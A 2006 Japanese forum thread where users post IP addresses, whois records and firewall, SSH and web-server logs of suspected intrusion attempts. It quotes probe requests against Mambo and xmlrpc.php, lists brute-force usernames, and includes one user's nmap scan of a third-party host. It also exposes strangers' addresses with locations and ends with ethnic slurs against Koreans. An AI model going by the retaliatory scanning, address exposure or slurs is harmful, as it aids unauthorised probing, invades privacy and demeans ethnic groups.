Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 219.122.128.0/18 b. [ネットワーク名] K-OPTICOM f. [組織名] 株式会社ケイ・オプティコム g. [Organization] K-Opticom Corporation m. [管理者連絡窓口] YM555JP n. [技術連絡担当者] YM555JP n. [技術連絡担当者] HA3280JP p. [ネームサーバ] ns1.eonet.ne.jp p. [ネームサーバ] ns7.eonet.ne.jp [割当年月日] 2002/11/21 [最終更新] 2005/12/21 13:38:19(JST) 上位情報 ---------- 株式会社ケイ・オプティコム (K-Opticom Corporation) [割り振り] 219.122.128.0/17 下位情報 ---------- 該当するデータがありません。 こいつ、うざい。
TCP SYN FLOOD攻撃:18回 IPアドレス 60.209.235.203 ホスト名 対応するホスト名がありません IPアドレス割当国 ※ 中国 (CN) TCP SYN FLOOD攻撃:19回 IPアドレス 219.153.17.207 ホスト名 対応するホスト名がありません IPアドレス割当国 ※ 中国 (CN) TCP SYN FLOOD攻撃:24回 IPアドレス 207.68.178.61 ホスト名 対応するホスト名がありません IPアドレス割当国 ※ アメリカ合衆国 (US) ポートスキャン:6回 IPアドレス 207.46.216.41 ホスト名 対応するホスト名がありません IPアドレス割当国 ※ アメリカ合衆国 (US) cnとかkrなんか国として蹴っちゃえばいいのに
222.92.248.53 連中が中国だからなのか、それともこちらが日本だからなのか・・・。
IPアドレス 219.99.205.242 ホスト名 adsl-1-7242.adsl.nsk.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 xDSL
759 :
名無しさん@お腹いっぱい。 :2006/03/20(月) 18:13:27
侵入:MS ASN1 Integer Overflow TCP 侵入者:58.78.240.199(1288) 危険度:高 プロトコル:TCP
IP: 218.110.53.213 DNS: p6e35d5.tokynt01.ap.so-net.ne.jp Node: 真野麻○江 Group: WORKGROUP NetBIOS: WORKGROUP ハァハァしてていいっすか?
172.205.45.69 172.205.119.162 172.205.27.252
207.68.178.61 アメリカ 218.28.144.2 中国 203.136.43.205 日本 202.222.30.208 日本 66.220.2.27 アメリカ 220.228.161.166 台湾 61.152.90.171 中国 58.215.68.214 中国 61.175.194.153 中国 219.154.55.233 中国 222.137.116.11 中国 222.139.154.29 中国 中国がやたら多い
どうやってsoftbankの所在県名を割り出すんですか? サイトチェックじゃ分からないのですが
自分も気になって検索してみたらでてきたよ IPアドレスで検索してみて ソフトバンク使ってて県名でないじゃんって喜んでたら・・・これですよ
766 :
名無しさん@お腹いっぱい。 :2006/03/21(火) 18:26:44
すごい、くだらないスレじゃね!
>>1 ぶっ殺すよ!リンク個人向きじゃない。
アホくさい
URL無効じゃね wwwwwwwうっwwwwwwえっwwww
運営がウィルス張るような異常者とか
IPを無意味に感情で晒すDQNを記録してよ!!
プロバイダ変えれば、終わりだろ?じゃね
正直2chはこんなにウザったい年寄りが多いとは思わなかった!
秋葉原行くようなおじんとは話があわん!
こっちがスルーしてるのに煽ってきたり、いいかげんにしてほしい
暖房のがええわ
IPアドレス 210.20.124.208
ホスト名 210-20-124-208.rev.home.ne.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 群馬県
市外局番 --
接続回線 CATV
>>766 たぶん不正アクセスされて頭に来るから貼ってるんだよ。
768 :
名無しさん@お腹いっぱい。 :2006/03/21(火) 19:20:23
219.182.184.88 最近アクセス覆い
( ^ω^)766はきっと辛いことがあったんだと思うお
770 :
名無しさん@お腹いっぱい。 :2006/03/22(水) 06:31:24
210.136.29.179:55510(pl435.nas923.p-shizuoka.nttpc.ne.jp) と 218.139.63.20:1418(softbank218139063020.bbtec.net) が物凄い突撃してくる。ウザス(;^ω^)
TCP SYN FLOOD攻撃 80.82.17.20 フランス 210.148.115.86 日本 202.248.141.152 日本 202.248.141.156 日本 203.136.42.148 日本 218.27.19.247 中国 65.54.194.118 アメリカ 151.38.27.182 アメリカ 202.93.87.154 ヤフー 216.10.118.17 アメリカ ポートスキャン 210.136.232.249 日本 203.136.42.148 日本 207.46.217.74 アメリカ 207.46.217.54 アメリカ 207.46.217.42 アメリカ 207.46.216.36 アメリカ
772 :
名無しさん@お腹いっぱい。 :2006/03/22(水) 17:28:43
163.51.60.251 eagle.im.kindai.ac.jp a. [Network Number] 163.51.0.0/16 b. [Network Name] KNURINK g. [Organization] Kinki University m. [Administrative Contact] KK1254JP n. [Technical Contact] HY033JP p. [Nameserver] rs6000.cc.kindai.ac.jp p. [Nameserver] tomato.cc.fuk.kindai.ac.jp [Assigned Date] 1992/07/16 [Return Date] [Last Update] 2005/08/23 12:02:36(JST)
773 :
名無しさん@お腹いっぱい。 :2006/03/22(水) 18:49:54
今日はポート139へのアクセスが山ほどあるが、ウイルスですか?
774 :
名無しさん@お腹いっぱい。 :2006/03/22(水) 20:22:57
>>773 あんたが繋いだノードにぶら下がっているやつらが、139を使うウィルスに感染しているバカが多いだけ
IPアドレスの頭から2つが同じやつらな
218.229.206.169 叩いても何も出ないけど 鬱陶しいことこの上ない
777 :
名無しさん@お腹いっぱい。 :2006/03/22(水) 23:08:24
60.39.178.218 222.225.39.82 219.10.46.61 219.161.169.191 211.9.161.253 59.84.10.230
220.111.189.94 広島 OCN
67.141.30.218 アメリカ
IPアドレス 221.24.40.141 ホスト名 softbank221024040141.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 三重県 市外局番 -- 接続回線 xDSL トロイの木馬
781 :
名無しさん@お腹いっぱい。 :2006/03/23(木) 03:48:51
IPアドレス 169.254.88.59 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 該当なし 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし 晒す晒す漏れなく晒すw
IPアドレス 211.132.68.47 ホスト名 PPP47.saitama-ip.dti.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 フレッツISDN だ埼玉から乙ww
IPアドレス 211.135.41.53 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
221.152.101.46 韓国 ホストなし 221.141.27.92 韓国 ホストなし 10秒間に9回 送信先ポートをかえてアクセスしてくる 外国経由して誰かがアクセスしてるってこと? なにがしたいんだか
785 :
名無しさん@お腹いっぱい。 :2006/03/23(木) 19:48:49
IP 221.170.209.108 FLA1AbS108.chb.mesh.ad.jp
786 :
名無しさん@お腹いっぱい。 :2006/03/24(金) 11:45:52
どうやったら、不正にアクセスされてるか分かるんですか? 一度、調べてみたいのですが。
788 :
名無しさん@お腹いっぱい。 :2006/03/24(金) 12:38:01
786ですけど FWのログの見方が・・・分からないのです。 馬鹿ですみません。教えてください。
789 :
名無しさん@お腹いっぱい。 :2006/03/24(金) 13:08:41
786です 自己解決しました。 結構アクセスしてくるモンですね
790 :
名無しさん@お腹いっぱい。 :2006/03/24(金) 15:06:23
IPアドレスから地域を特定することってできますか?
プロバイダによるけど日本の大体は都道府県ぐらいはわかるよ
返答ありがとうございます。都道府県より詳しいことはわからないですか?
金と時間があれば分かるがね そこまでしてやるよりもはじいた方が楽だろ
794 :
名無しさん@お腹いっぱい。 :2006/03/24(金) 16:33:30
12.158.80.10 216.10.118.18 61.129.70.84 221.112.20.67
795 :
名無しさん@お腹いっぱい。 :2006/03/24(金) 21:04:46
IP 221.170.209.108 FLA1AbS108.chb.mesh.ad.jpはじいてください
195.225.176.160 多分、ウクライナ 執拗にblogの方にトラックバックを延々と送りつけて来て、禿げしくうざい。 IPでググっても、結構、被害者いるみたいだし、.htaccess等で弾いておいた方が無難
>>793 はじくってどうやってはじくの?
豆鉄砲とかでバキュンってやるのかな?
そうだよ。
結構難しいんだよね。
う〜〜〜ん難しいです・・・・ モニタが豆鉄砲の威力で割れそうでつ・・・・・
すべてsshポートへの不正ログインを試みられたものです。 60.28.39.80 逆引き不可 rootログイン試行 141.108.12.157 逆引き不可 適当なユーザー名+パスワードでの辞書攻撃 150.46.224.149 岡山大学 同上 辛うじて侵入はされていないが、sshでのパスワード認証完全禁止にしたほうがよいかも。 でも、一番腹が立ったのは、自宅から自分の実質的に専有するサーバにpsftpで繋いだときに、 サーバから自宅への応答が1025番のポートにいってしまったためサーバ乗っ取りと誤認され 上の管理者に通信を止められてしまったこと。 Mar 17 20:56:34 localhost sshd[11593]: Accepted password for ********* from 221.190.154.93 port 1025 ssh2 勘違いでクリーンインストールまで行く羽目になった身にもなってくれ・・・。
>>801 60.28.39.80 中国 (CN)
141.108.12.157 欧州連合 (EU)
まぁ意味はないが
61.121.33.19 ntmiex005199.miex.nt.isdn.ppp.infoweb.ne.jp ntmiex005199.miex.nt.isdn.ppp.infoweb.ne.jp
804 :
名無しさん@お腹いっぱい。 :2006/03/26(日) 13:35:06
ZB061121.ppp.dion.ne.jp 192.168.0.5 テラウザスwwww
805 :
名無しさん@お腹いっぱい。 :2006/03/26(日) 13:36:34
こんなの来てた。 Failed password for invalid user scanner from 133.41.199.82 port 49053 ssh2 www.surg2nd.hiroshima-u.ac.jp 大学病院のサーバー腐ってるぞ
809 :
名無しさん@お腹いっぱい。 :2006/03/27(月) 16:57:30
こいつ氏ねばいいと思う。 FTPにキチガイが来た。 18時から0時過ぎまで1〜2秒おきに不正ログイン(失敗) それも13,770回! 不正に利用したユーザ名を繰り返す。 ADMINISTRATOR TEST GUEST ADMIN ADMINITRATOR ADMINISTRATEUR でADMINITRATOR、ADMINISTRATEURってなんだよ(ぷっ バカじゃねーかこいつ。 IPアドレス => 「 24.223.208.80 」 ホスト名変換 => 「 user-0cdvk2g.cable.mindspring.com 」 IPアドレス問合せ先 「 whois.arin.net (北アメリカおよびサブサハラ・アフリカ) 」 [Querying whois.arin.net] [whois.arin.net] Earthlink, Inc. ERLK-CBL-TW-CENTRAL (NET-24-223-128-0-1) 24.223.128.0 - 24.223.255.255 EARTHLINK, INC. ERLK-TW-NEW6 (NET-24-223-208-0-1) 24.223.208.0 - 24.223.215.255 たぶん何らかのウイルスの仕業だとは思うけど、 実被害がないからいいもののもし国内からあったら回数といいk察に届けてやる。
fw 入れてあっても何度も来るやつってなんなの? 以前毎日のように来ていて来なくなったと思ったら 忘れた頃にまたやってくんの…うざい
ここのところ、メールサーバーへのアタックがうざいです。 65.185.186.38 202.65.149.74 202.14.69.11 218.147.192.162 設定はしっかりやってあるのでrejectされてますが、とにかくうざい。 毎日1つはくる(アタックの数は十数回)。
IPアドレス 210.236.187.220 ホスト名 dhcp187-219.ztv.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 和歌山県 市外局番 -- 接続回線 CATV
ZM228085.ppp.dion.ne.jp こいつを規制するにはppp.dion.ne.jpで規制しないとダメ?
814 :
名無しさん@お腹いっぱい。 :2006/03/29(水) 13:51:50
ホスト名 softbank219045016069.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 神奈川県 市外局番 -- 接続回線 xDSL
815 :
名無しさん@お腹いっぱい。 :2006/03/29(水) 15:48:55
59.44.58.30(AU) 66.221.91.152(US) 珍しくCNかKR以外の国からお客さんが
816 :
名無しさん@お腹いっぱい。 :2006/03/29(水) 16:43:16
プロフからIPを抜くにはどうやったらいいんですか?
817 :
名無しさん@お腹いっぱい。 :2006/03/29(水) 19:19:47
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 203.138.30.0/24 b. [ネットワーク名] TIKI f. [組織名] 株式会社エヌディエス g. [Organization] NDS CO., LTD. m. [管理者連絡窓口] KS870JP n. [技術連絡担当者] TH2192JP p. [ネームサーバ] ns1.tiki.ad.jp p. [ネームサーバ] ns2.tiki.ad.jp [割当年月日] 2005/06/02 [返却年月日] [最終更新] 2005/06/02 21:02:04(JST) 上位情報 ---------- 株式会社エヌ・ティ・ティ ピー・シー コミュニケーションズ (NTT PC Communications Incorporated) [割り振り] 203.138.0.0/16
IPアドレス 202.75.235.177 ホスト名 177.235.75.202.tokyo.global.alpha-net.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 種別不明 今日の2時ぐらいから約1分間で140個ぐらいのログが残ってた・・・なんか気持ち悪い
820 :
名無しさん@お腹いっぱい。 :2006/03/29(水) 20:46:02
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.135.99.0/24 b. [ネットワーク名] BARTOK-NET f. [組織名] 株式会社ジェンマエンジニアリング g. [Organization] Gemma Engineering m. [管理者連絡窓口] AS116JP n. [技術連絡担当者] AS116JP p. [ネームサーバ] ns0.bartok.ad.jp p. [ネームサーバ] ns1.bartok.ad.jp [割当年月日] 2006/03/20 [返却年月日] [最終更新] 2006/03/20 01:47:04(JST) 上位情報 ---------- 株式会社ジェンマエンジニアリング (Gemma Engineering) [割り振り] 210.135.96.0/20 下位情報 ---------- 該当するデータがありません。
不正アクセスして来てるかどうかってどうやって調べるんですか? PCが勝手に起動したりと最近ちょっと変なのです。
勝手に起動 それは霊障です。
823 :
名無しさん@お腹いっぱい。 :2006/03/29(水) 21:46:07
>>822 911関連の告発で外人に目をつけられたっぽいです。
Mar 30 05:57:42 *** sshd[12311]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=dns.tk.itboost.co.jp Mar 30 05:57:45 *** sshd[12311]: Failed password for invalid user takahashi from 61.195.147.99 port 47508 ssh2 f. [組織名] 株式会社 アイティーブースト 「企業IT化を加速するプロフェッショナル集団」って、まず自分とこのサーバをちゃんと管理してください。 恥
826 :
名無しさん@お腹いっぱい。 :2006/03/30(木) 11:11:48
221.5.251.183
827 :
名無しさん@お腹いっぱい。 :2006/03/30(木) 17:09:52
P2P用に誰も使わないポートを開けたんだが こいつだけが試行してきやがる・・・ 今のとここいつだけずーっと連続で来る。 222.148.26.69 発信ポートは34624
IPアドレス 220.108.36.152 ホスト名 i220-108-36-152.s05.a001.ap.plala.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 北海道 市外局番 -- 接続回線 光
829 :
名無し :2006/03/31(金) 13:47:14
IPアドレス 218.229.152.74 ホスト名 eatkyo233074.adsl.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 東京都 市外局番 -- 接続回線 xDSL
おまいらここに載せてるIPポートスキャンしてんの?
,, -‐''" ̄ ̄`゙ ヽ、 / \ / i ノ ___ノ (____,,--‐‐'''"⌒::::: l.川 . |(●), 、(●)、.: |川 ? | ,,ノ(、_, )ヽ、,, .:::: |リリ . | mj |=‐ァ' .:::: |((( 彡\,〈__ノニニ´ .:::/ミミ /ノ ノ -‐‐一´\
833 :
名無しさん@お腹いっぱい。 :2006/03/32(土) 13:45:17
a. [IPネットワークアドレス] 211.131.0.0/16 b. [ネットワーク名] ODN f. [組織名] オープンデータネットワーク(日本テレコム株式会社) g. [Organization] Open Data Network(JAPAN TELECOM CO.,LTD.) m. [管理者連絡窓口] YN234JP n. [技術連絡担当者] YN234JP p. [ネームサーバ] ns2.odn.ne.jp p. [ネームサーバ] ns4.odn.ne.jp [割当年月日] 2000/09/27 [返却年月日] [最終更新] 2000/11/27 15:44:02(JST) 上位情報 ---------- 日本テレコム株式会社 (JAPAN TELECOM CO.,LTD.) [割り振り] 211.131.0.0/16 下位情報 ---------- 該当するデータがありません。
Network Information: [ネットワーク情報] a.[IPネットワークアドレス]210.136.232.128/25 b.[ネットワーク名]VALUECOM f.[組織名]バリューコマース株式会社 g.[Organization]Value Commerce Co.,Ltd. m.[管理者連絡窓口]MN4916JP n.[技術連絡担当者]MN4916JP p.[ネームサーバ] [割当年月日]2002/02/20 [返却年月日] [最終更新]2002/02/20 14:34:04(JST) 上位情報 ---------- 株式会社エヌ・ティ・ティ ピー・シー コミュニケーションズ (NTT PC Communications Incorporated) [割り振り] 210.136.0.0/16 InfoSphere (株式会社NTTPCコミュニケーションズ) (InfoSphere (NTT PC Communications, Inc.)) SUBA-029-494 [SUBA] 210.136.232.0/24
Whois全部貼ってるおまえ ウザいから書き込むな!
>>836 ウザいなら見に来なくていいよ
おまえ一人居なくても誰も困らんし
【レス抽出】 対象スレ: 不正アクセスしてくるIPを晒すスレ Part8 キーワード: ウザいから書き込むな 244 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/12/13(火) 16:33:28 httpサーバーからセットでアクセスされているおまえ ウザいから書き込むな! 582 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/02/13(月) 15:41:20 Whois全部貼ってるおまえ ウザいから書き込むな! 836 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/03/32(土) 16:43:44 Whois全部貼ってるおまえ ウザいから書き込むな! 抽出レス数:3
839 :
名無しさん@お腹いっぱい。 :2006/03/32(土) 23:13:47
[Querying whois.apnic.net]
[whois.apnic.net]
% [whois.apnic.net node-2]
% Whois data copyright terms
http://www.apnic.net/db/dbcopyright.html inetnum: 219.146.0.0 - 219.147.31.255
netname: CHINATELECOM-sd
descr: CHINANET shandong province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
country: CN
admin-c: CH93-AP
tech-c: WG1-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINATELECOM-sd
changed:
[email protected] 20030820
status: ALLOCATED NON-PORTABLE
source: APNIC
person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail:
[email protected] address: No.31 ,jingrong street,beijing
address: 100032
phone: +86-10-58501724
fax-no: +86-10-58501724
country: CN
changed:
[email protected] 20051212
mnt-by: MAINT-CHINANET
source: APNIC
それで?
841 :
名無しさん@お腹いっぱい。 :2006/04/02(日) 00:24:27
IPアドレス 210.157.21.145 ホスト名 unused-210-157-021-145.interq.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
842 :
名無しさん@お腹いっぱい。 :2006/04/02(日) 09:38:34
IPアドレス 72.194.104.46 ホスト名 ip72-194-104-46.oc.oc.cox.net IPアドレス 割当国 ※ アメリカ合衆国 (US) なんかもう既に100回以上こいつから来るんだが・・・ アメリカからだからなんか怖いわけだが・・・大丈夫かな。
p6081-ipad202niigatani.niigata.ocn.ne.jp
844 :
名無しさん@お腹いっぱい。 :2006/04/02(日) 11:54:59
IPアドレス 60.238.140.195 ホスト名 FLH1Aca195.chb.mesh.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 千葉県 市外局番 -- 接続回線 光
IPアドレス 221.83.120.16 ホスト名 softbank221083120016.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 鹿児島県 市外局番 -- 接続回線 xDSL
IPアドレス 218.226.113.244 ホスト名 eatkyo184244.adsl.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 東京都 市外局番 -- 接続回線 xDSL ぬっ頃したい
p2043-ipbf301souka.saitama.ocn.ne.jp ↑ このIPヤバイ? 層化って書いてあるんだけど ALG.EXEからアクセスしてくるんだけど、停止したほうが良いかね?
草加
さいたまー
219.166.120.226 なんだこいつ、社員か?
853 :
名無しさん@お腹いっぱい。 :2006/04/05(水) 22:30:39
p1086-ipad02daianji.nara.ocn.ne.jp うっぜえw
p2043-ipbf301souka.saitama.ocn.ne.jp ocnうぜーーーーーーーーーーーーー!
2006/04/06 14:59:50 IP_Filter REJECT UDP 157.56.246.34:30308 > 192.168.2.1:1026 (IP-PORT=7) 何でつか? ゲイシの会社 Worm に感染しやがりますたか?
856 :
名無しさん@お腹いっぱい。 :2006/04/07(金) 00:08:48
d-219-99-247-082.cable.katch.ne.jp d-219-99-247-106.cable.katch.ne.jp うざすぎ しかも同じ会社
857 :
名無しさん@お腹いっぱい。 :2006/04/07(金) 02:04:43
IPアドレス202.219.190.177 ホスト名ntgnma066177.gnma.nt.ftth.ppp.infoweb.ne.jp 割当国 日本 (JP) 都道府県群馬県 市外局番-- 接続回線光 マジ超ウゼー
858 :
名無しさん@お腹いっぱい。 :2006/04/07(金) 03:33:25
218.130.213.160 何か少しでも手がかりが欲しいです お願いします
>>858 つsoftbank218130213160.bbtec.net
860 :
名無しさん@お腹いっぱい。 :2006/04/08(土) 14:32:57
a. [IPネットワークアドレス] 219.100.128.0/17 b. [ネットワーク名] HDD f. [組織名] 平成電電株式会社 g. [Organization] HEISEI DENDEN CO., LTD. m. [管理者連絡窓口] TF3168JP n. [技術連絡担当者] MK11562JP n. [技術連絡担当者] SK8303JP p. [ネームサーバ] a.hdd.co.jp p. [ネームサーバ] b.hdd.co.jp p. [ネームサーバ] c.hdd.co.jp [割当年月日] 2002/08/26 [最終更新] 2005/07/06 11:08:09(JST) 上位情報 ---------- 平成電電株式会社 (HeiseiDenden co., ltd.) [割り振り] 219.100.0.0/16 下位情報 ---------- 該当するデータがありません。
861 :
名無しさん@お腹いっぱい。 :2006/04/08(土) 19:00:08
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 203.216.224.0/19 b. [ネットワーク名] YAHOO-NET f. [組織名] ヤフー株式会社 g. [Organization] Yahoo Japan Corp. m. [管理者連絡窓口] TT9944JP n. [技術連絡担当者] TT9944JP p. [ネームサーバ] dnsg01.yahoo.co.jp p. [ネームサーバ] ns10.yahoo.co.jp [割当年月日] 2005/03/03 [返却年月日] [最終更新] 2005/12/21 17:32:02(JST) 上位情報 ---------- 株式会社ブロードバンドタワー (BroadBand Tower, Inc.) [割り振り] 203.216.192.0/18
アホばっか
i218-47-19955.s06.a011.ap.plala.or.jp これひどい><
864 :
名無しさん@お腹いっぱい。 :2006/04/10(月) 00:36:41
IPアドレス 169.254.155.70 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 該当なし 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし IP Spoofing
60.47.159.51 新潟 光 ↑しつこい
>>863 plala、Nifty、Biglobe、Yahooがゴミと厨房の巣窟はネット界の常識。
softbank219170244185.bbtec.net さっきからウザ過ぎる
868 :
名無しさん@お腹いっぱい。 :2006/04/12(水) 03:54:30
IPアドレス 210.157.21.146 ホスト名 unused-210-157-021-146.interq.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし TCP SYN Flood
どうやって不正アクセスされたのを調べるの?
>>869 FWとかルーターのログを見ればいいんだよ
871 :
: :2006/04/13(木) 14:53:01
>>870 見れるんだけど見方が分からん。
どれが不正アクセスなのか。
じゃあ気にしなくていいよ。 気にすると健康に毒だから。 それに(ブロックしたという)ログに残ると言うことは正常にブロックしたということなんだから。
873 :
名無しさん@お腹いっぱい。 :2006/04/15(土) 02:04:27
Apr 15 01:10:21 black sshd[1597]: Illegal user staff from 221.248.168.112
数百行省略
Apr 15 01:11:21 black sshd[1255]: Illegal user pgsql from 221.248.168.112
http://221.248.168.112/ ぽわぽわべあのページ
おめでたいヴァカなのか、踏み台にされてるのか。
お前ら、ちゃんとルーター導入しろよ 安価なルーターでもないのとあるのとでは全然違うぞ 不正アクセスのログなんて残ったこと一度もねーし
>>874 残ってないってすでに侵入されてんじゃねーの?www
877 :
名無しさん@お腹いっぱい。 :2006/04/15(土) 17:15:42
ブラウザーハイジャックってどうやるの?
878 :
名無しさん@お腹いっぱい。 :2006/04/15(土) 17:21:13
他のパソコンに入るに(リモート)必要操作教えてください
IPアドレス 169.254.155.70 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 該当なし 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
881 :
名無しさん@お腹いっぱい。 :2006/04/15(土) 20:16:36
IPアドレス 61.203.122.249 ホスト名 ACCA1Aaa249.hrs.mesh.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 広島県 市外局番 -- 接続回線 xDSL
IPアドレス 59.136.101.38 ホスト名 KHP059136101038.ppp-bb.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 神奈川県 市外局番 -- 接続回線 光
883 :
名無しさん@お腹いっぱい。 :2006/04/15(土) 21:27:12
2006/04/15 21:24:12 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4120 (IP-PORT=6) 2006/04/15 21:24:15 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4255 (IP-PORT=6) 2006/04/15 21:24:19 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4175 (IP-PORT=6) 2006/04/15 21:24:24 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4297 (IP-PORT=6) 2006/04/15 21:24:25 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4298 (IP-PORT=6) 2006/04/15 21:24:31 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4228 (IP-PORT=6) 2006/04/15 21:24:33 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4406 (IP-PORT=6) 2006/04/15 21:24:34 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4239 (IP-PORT=6) ポイントキャスト株式会社
884 :
名無しさん@お腹いっぱい。 :2006/04/15(土) 21:29:35
# nmap -O 61.66.34.67
Starting nmap 3.81 (
http://www.insecure.org/nmap/ ) at 2006-04-15 09:03 JST
Interesting ports on adsl-61-66-34-67.TC.sparqnet.net (61.66.34.67):
(The 1644 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
68/tcp filtered dhcpclient
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
113/tcp open auth
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
4444/tcp filtered krb524
10000/tcp open snet-sensor-mgmt
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.20 (Itanium)
Uptime 25.900 days (since Mon Mar 20 11:28:04 2006)
Nmap finished: 1 IP address (1 host up) scanned in 14.952 seconds
885 :
名無しさん@お腹いっぱい。 :2006/04/15(土) 22:30:51
IPアドレス 218.219.179.42 ホスト名 fiasb-218-219-179-042.pool.mitene.or.jp 不正侵入された。。。
シナIP 202.97.以下 うぜぇ
ファイアウォールのログ見たら「DROP」がいっぱい…。 こんなに不正アクセスされてたってこと!?
>>887 DROP=不正アクセスを排除したという意味だと思う
220.221.225.17 新潟 77回ノックされますた。 ウザイ
すまんが教えてくれ。N/Aってなんだ?
890だけどN/Aされても大丈夫なのか?
あぼーん
こいつコンピュータからメールアドレスを取り出そうとしたぞ? m2f02.yahoo.co.jp 211.14.13.197
もまいらそれをブロックリストにして PeerGuardian2 で防ごうぜ?それぐらいは出来るだろ?
PG2で中韓香を塞いだらWindows Updateからパッチが落とせなくなって焦った
んなこたーない
898 :
名無しさん@お腹いっぱい。 :2006/04/19(水) 23:36:48
203.216.235.248 オレはWEBサーバなんか立ててねーつーの。
899 :
名無しさん@お腹いっぱい。 :2006/04/19(水) 23:41:32
IPアドレス 211.2.29.221 ホスト名 ntiskw028221.iskw.nt.adsl.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 石川県 市外局番 -- 接続回線 xDSL
poppass (パスワード変更) 106 TCP
140.111.130.27 pc17.eces.ilc.edu.tw
Ministry of Education Computer Center
12th Fl, 106, Hoping E. Road, Sec 2.
Taiwan Republic of China, R.O.C
TW
Domain Name: edu.tw
Contact:
TANet, Administrator
[email protected] 886-2-87329007
これ何すか???何だよ?パスワード変更って何かこぇぇよ
台湾の人なんなのさー
61.115.76.253 : sljiyu.st.wakwak.ne.jp. SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1 61.115.76.253 - - [20/Apr/2006:10:53:05 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST 61.115.76.253 - - [20/Apr/2006:10:53:09 +0900] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST 61.115.76.253 - - [20/Apr/2006:10:53:10 +0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid 61.115.76.253 - - [20/Apr/2006:10:53:15 +0900] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid] 61.115.76.253 - - [20/Apr/2006:10:53:16 +0900] "POST /xmlrpc.php HTTP/1.1" 404 208 61.115.76.253 - - [20/Apr/2006:10:53:17 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 215 61.115.76.253 - - [20/Apr/2006:10:53:18 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 221 61.115.76.253 - - [20/Apr/2006:10:53:19 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 218 毎日やってきていい加減しつこいです。
902 :
名無しさん@お腹いっぱい。 :2006/04/20(木) 15:32:18
p5159-ip01daianji.nara.ocn.ne.jp 奈良の大安寺から何の用だ?
eme5.amec.med.yamaguchi-u.ac.jp
202.248.237.134 portscanされました
>>902 ウイルスに感染してんじゃない?
おしえてあげたら?
906 :
名無しさん@お腹いっぱい。 :2006/04/22(土) 13:55:00
たまたまネットワークをモニタリングしたら怪しいアクセスが、 IPアドレス 221.143.46.192 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし 調べてみたらport:22を突っついててあがんの。 チョンコウ馬鹿じゃねぇか氏ねや 今も昔も変わらずやることが汚い民族ですね。 民族の誇りっという物がないのだろうか。 埃しか揃っていない民族に求めても無駄か。
907 :
名無しさん@お腹いっぱい。 :2006/04/23(日) 12:22:02
